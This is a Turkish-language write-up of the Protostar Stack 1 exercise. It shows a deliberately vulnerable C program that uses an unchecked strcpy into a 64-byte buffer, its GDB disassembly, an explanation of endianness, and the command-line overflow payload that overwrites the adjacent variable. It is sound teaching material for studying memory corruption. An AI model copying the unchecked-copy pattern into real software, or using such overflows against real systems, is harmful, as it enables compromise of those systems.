Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Login

Register Now

Canyoupwn.me ~

TR | Protostar: Stack 1 Writeup

Stack1.c

Amaç: “you have correctly got the variable to the right value” satırını yazdırmak.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];

 if(argc == 1) {
   errx(1, "please specify an argument\n");
 }

 modified = 0;
 strcpy(buffer, argv[1]);

 if(modified == 0x61626364) {
   printf("you have correctly got the variable to the right value\n");
 } else {
   printf("Try again, you got 0x%08x\n", modified);
 }
}

Bu seviyede de istediğiğimiz cümleyi yazdırabilmek için programın akışını daha spesifik bir şekilde değiştirmemiz gerekiyor. Önceki seviyede modifieddeğişkeni 0 haricinde bir değer olması yeterken şimdi 0x61626364 değerine eşit olması gerekmekte.

Programın Çalıştırılması

[email protected]:/opt/protostar/bin$ ./stack1
stack1: please specify an argument

[email protected]:/opt/protostar/bin$ ./stack1 Merhaba
Try again, you got 0x00000000

Program çalıştırıldığı zaman bir önceki seviyedeki gibi herhangi bir input beklemeden argüman belirtiniz çıktısı veriyor. Herhangi bir argüman verdiğim zaman ise Tekrar deneyin diyip o anki modified değişkeninin değerini hex olarak yazdırıyor. Bu seviyeyide aynı şekilde uzun bir değer verdikten sonra geçebiliriz. Fakat gdb (gnu debugger)’dan bahsetmek istiyorum. GDB ile bir programı açıp satır satır assembly kodlarını inceleyebilir, değişiklik yapabilir veya programın akışını değiştirebiliriz.

GDB ve AT&T Sentaks

Aşağıdaki çıktıyı biraz yorumlayarak basitleştirmek gerekirse. Sol taraftaki 0x ile başlayan 16lı tabanındaki sayılar, sağ tarafındaki opcode ve argüman(lar)’ın saklandığı hafıza adresleridir.

Şuan sağdaki argümanlar biraz göz korkutucu görünebilir bunun yerine şu anda varsayılan olan AT&T sentaksını intel ile değiştireceğim.

[email protected]:/opt/protostar/bin$ gdb stack1
Reading symbols from /opt/protostar/bin/stack1...done.
(gdb) b main
Breakpoint 1 at 0x804846d: file stack1/stack1.c, line 11.
(gdb) disassemble main
Dump of assembler code for function main:
0x08048464 <main+0>:  push  %ebp
0x08048465 <main+1>:  mov  %esp,%ebp
0x08048467 <main+3>:  and  $0xfffffff0,%esp
0x0804846a <main+6>:  sub  $0x60,%esp
0x0804846d <main+9>:  cmpl  $0x1,0x8(%ebp)
0x08048471 <main+13>:  jne  0x8048487 <main+35>
0x08048473 <main+15>:  movl  $0x80485a0,0x4(%esp)
0x0804847b <main+23>:  movl  $0x1,(%esp)
0x08048482 <main+30>:  call  0x8048388 <[email protected]>
0x08048487 <main+35>:  movl  $0x0,0x5c(%esp)
0x0804848f <main+43>:  mov  0xc(%ebp),%eax
0x08048492 <main+46>:  add  $0x4,%eax
0x08048495 <main+49>:  mov  (%eax),%eax
0x08048497 <main+51>:  mov  %eax,0x4(%esp)
0x0804849b <main+55>:  lea  0x1c(%esp),%eax
0x0804849f <main+59>:  mov  %eax,(%esp)
0x080484a2 <main+62>:  call  0x8048368 <[email protected]>
0x080484a7 <main+67>:  mov  0x5c(%esp),%eax
0x080484ab <main+71>:  cmp  $0x61626364,%eax
0x080484b0 <main+76>:  jne  0x80484c0 <main+92>
0x080484b2 <main+78>:  movl  $0x80485bc,(%esp)
0x080484b9 <main+85>:  call  0x8048398 <[email protected]>
0x080484be <main+90>:  jmp  0x80484d5 <main+113>
0x080484c0 <main+92>:  mov  0x5c(%esp),%edx
0x080484c4 <main+96>:  mov  $0x80485f3,%eax
0x080484c9 <main+101>: mov  %edx,0x4(%esp)
0x080484cd <main+105>: mov  %eax,(%esp)
0x080484d0 <main+108>: call  0x8048378 <[email protected]>
0x080484d5 <main+113>: leave
0x080484d6 <main+114>: ret
End of assembler dump.

GDB İntel Sentaks

Intel sentaksına geçmek için gdb de set disassembly-flavor intel yazıp tekrardan main fonksiyonunun makina kodlarını assembly kodlarına çeviriyorum. -disassemble-

(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048464 <main+0>:  push  ebp
0x08048465 <main+1>:  mov  ebp,esp
0x08048467 <main+3>:  and  esp,0xfffffff0
0x0804846a <main+6>:  sub  esp,0x60
0x0804846d <main+9>:  cmp  DWORD PTR [ebp+0x8],0x1
0x08048471 <main+13>:  jne  0x8048487 <main+35>
0x08048473 <main+15>:  mov  DWORD PTR [esp+0x4],0x80485a0
0x0804847b <main+23>:  mov  DWORD PTR [esp],0x1
0x08048482 <main+30>:  call  0x8048388 <[email protected]>
0x08048487 <main+35>:  mov  DWORD PTR [esp+0x5c],0x0
0x0804848f <main+43>:  mov  eax,DWORD PTR [ebp+0xc]
0x08048492 <main+46>:  add  eax,0x4
0x08048495 <main+49>:  mov  eax,DWORD PTR [eax]
0x08048497 <main+51>:  mov  DWORD PTR [esp+0x4],eax
0x0804849b <main+55>:  lea  eax,[esp+0x1c]
0x0804849f <main+59>:  mov  DWORD PTR [esp],eax
0x080484a2 <main+62>:  call  0x8048368 <[email protected]>
0x080484a7 <main+67>:  mov  eax,DWORD PTR [esp+0x5c]
0x080484ab <main+71>:  cmp  eax,0x61626364
0x080484b0 <main+76>:  jne  0x80484c0 <main+92>
0x080484b2 <main+78>:  mov  DWORD PTR [esp],0x80485bc
0x080484b9 <main+85>:  call  0x8048398 <[email protected]>
0x080484be <main+90>:  jmp  0x80484d5 <main+113>
0x080484c0 <main+92>:  mov  edx,DWORD PTR [esp+0x5c]
0x080484c4 <main+96>:  mov  eax,0x80485f3
0x080484c9 <main+101>: mov  DWORD PTR [esp+0x4],edx
0x080484cd <main+105>: mov  DWORD PTR [esp],eax
0x080484d0 <main+108>: call  0x8048378 <[email protected]>
0x080484d5 <main+113>: leave
0x080484d6 <main+114>: ret
End of assembler dump.

Virgül yerine boşluk görmek ve registerların başında % görmemek okumayı kolaylaştırıyor. İki sentaksın aralarındaki tek fark bu değil aynı zamanda assign yani atama yapılan yerde değişiyor.

Intel Sentaks

opcode hedef,kaynak
mov eax,[ecx]

AT&T Sentaks

opcode kaynak,hedef
movl (%ecx),%eax

Modified Değişkenini Değiştirilmesi

Aşağıdaki gibi bir kaç şekilde stack1 programına argüman yollayabiliriz.

[email protected]:/opt/protostar/bin$ ./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA #64 tane A
Try again, you got 0x00000000
[email protected]:/opt/protostar/bin$ ./stack1 $(python -c "print('A'*64)")
Try again, you got 0x00000000
[email protected]:/opt/protostar/bin$ ./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC
Try again, you got 0x00000043
[email protected]:/opt/protostar/bin$ ./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
Try again, you got 0x43434343
[email protected]:/opt/protostar/bin$ ./stack1 $(python -c "print('A'*64+'CCCC')")
Try again, you got 0x43434343
[email protected]:/opt/protostar/bin$ ./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADEFG
Try again, you got 0x47464544

Bir önceki seviyede olduğu gibi 64 tane A(0x41) harfiyle bufferi dolduruyorum. Bunu daha kısa bir şekilde pythondan yardım alarak doldurabileceğimi söylemiştim. Burada dikkat çekmek istediğim son iki örnekte modified variable yerine istediğimi yazdırabiliyor oluşum. Fakat yazdırırken dikkat etmem gereken bir nokta sondan bir önceki 64 tane A ve bir tane C olan örnekte değerim 0x00000043 olması. Yani benim her modified değişkenine yazdığım harf tersten gözüküyor bunun sebebi bizim Big Endian olarak düşünmemiz ama makinaların Little Endian olarak çalışmasından kaynaklanıyor. Aralarındaki temel fark en kıymetli bitin solda yada sağda olmasıdır.

Madem istediğimiz şekilde modified değişkenini değiştirebiliyoruz o zaman bizden istenen değeri yazmayı deniyelim. Stack1.c’dekiif(modified==0x61626364) değerine bakacak olursak. 0x61626364 değerini modified değişkenine yazmak için bu sayıların ascii karşılığına pythondan yardım alarak buluyorum.

$ python3
Python 3.7.1 (default, Oct 22 2018, 10:41:28)
[GCC 8.2.1 20180831] on linux
>>> chr(0x61)
'a'
>>> chr(0x62)
'b'
>>> chr(0x63)
'c'
>>> chr(0x64)
'd'

Demek ki ben 64lük buffer’ı doldurduktan sonra abcd yazarsam bölümü geçebilirim.

[email protected]:/opt/protostar/bin$ ./stack1 $(python -c "print('A'*64+'abcd')")
Try again, you got 0x64636261

Little Endian‘a dikkat ederek 🙂

[email protected]:/opt/protostar/bin$ ./stack1 $(python -c "print('A'*64+'dcba')")
you have correctly got the variable to the right value

GDB hook-stop

GDB’de hook-stop denilen programın akışı her durdurulduğunda istediğimiz komutları sanki o komutları yazmışız gibi çalıştıran bir komut seti kuralı yazabiliriz.

(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>info registers # register'ların durumunu gösterir
>x/i $eip # bir sonraki çalıştırılacak komutu gösterir
>x/16wx $esp # Stack'in durumunu 16word olarak gösterir
>end

1 word 4byte olarak gdb içinde tanımlanmıştır.

Stack 0’da bahsettiğim gibi stack lokal değişkenlerin tutulduğu bir veri yapısıdır. Bu sayede bir programın içerisinde aynı değişken ismi farklı fonksiyonlar içerisinde yer alabilir.

Örnek vermek gerekirse programın içinde birden fazla i değişkeni olmasına rağmen bir fonksiyonun içerisinde sadece tek i değişkeni bulunabilir. Bunun olmasını sağlayan stack frame denilen, her fonksiyon için kendine ait bir stack alanının bulunmasıdır.

[email protected]:/opt/protostar/bin$ gdb stack1 -q # -q Banneri görmemek için
Reading symbols from /opt/protostar/bin/stack1...done.
(gdb) set disassembly-flavor intel
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>info registers
>x/i $eip
>x/16wx $esp
>end
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba
eax      0x61626364    1633837924
ecx      0x0   0
edx      0x45   69
ebx      0xb7fd7ff4    -1208123404
esp      0xbffff6f0    0xbffff6f0
ebp      0xbffff758    0xbffff758
esi      0x0   0
edi      0x0   0
eip      0x80484b9    0x80484b9 <main+85>
eflags     0x200246 [ PF ZF IF ID ]
cs       0x73   115
ss       0x7b   123
ds       0x7b   123
es       0x7b   123
fs       0x0   0
gs       0x33   51
0x80484b9 <main+85>:  call  0x8048398 <[email protected]>
0xbffff6f0:   0x080485bc   0xbffff93e   0xb7fff8f8   0xb7f0186e
0xbffff700:   0xb7fd7ff4   0xb7ec6165   0xbffff718   0x41414141
0xbffff710:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff720:   0x41414141   0x41414141   0x41414141   0x41414141
0x080484b9   19   in stack1/stack1.c
(gdb) ni
...
... Aşağıdaki mesajı görene kadar ni yazıp stacke bakalım
...
you have correctly got the variable to the right value
(gdb) x/24wx $esp
0xbffff6f0:   0x080485bc   0xbffff93e   0xb7fff8f8   0xb7f0186e
0xbffff700:   0xb7fd7ff4   0xb7ec6165   0xbffff718   0x41414141
0xbffff710:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff720:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff730:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff740:   0x41414141   0x41414141   0x41414141   0x61626364

Görüldüğü gibi 4 satır 0x41414141 ile dolu ve en sonda da bizim 0x61626364 yazdığımız dcba değeri bulunmakta. Her bir 0x41414141 4 byte olup toplam 16 tane word olduğunu hesaplarsak bu programdaki 64byte olan buffer’ı doldurduğumuzu görebiliriz. Sonrasındaki 0x61626364 modified değişkeni oluyor.

Bunu şu şekilde ispatlayabiliriz sadece 64byte’lık bir payload ile çalıştırdığımızda stackteki modified değişkeninin bulunduğu adresin 0 olmasını bekleriz.

...
... Üstteki gdb örneğinin aynısı. Sadece 68byte yerine
... 64byte'lık payload verdim.
(gdb) x/24wx $esp
0xbffff6f0:   0xbffff70c   0xbffff942   0xb7fff8f8   0xb7f0186e
0xbffff700:   0xb7fd7ff4   0xb7ec6165   0xbffff718   0x41414141
0xbffff710:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff720:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff730:   0x41414141   0x41414141   0x41414141   0x41414141
0xbffff740:   0x41414141   0x41414141   0x41414141   0x00000000

 

About Emir Kurt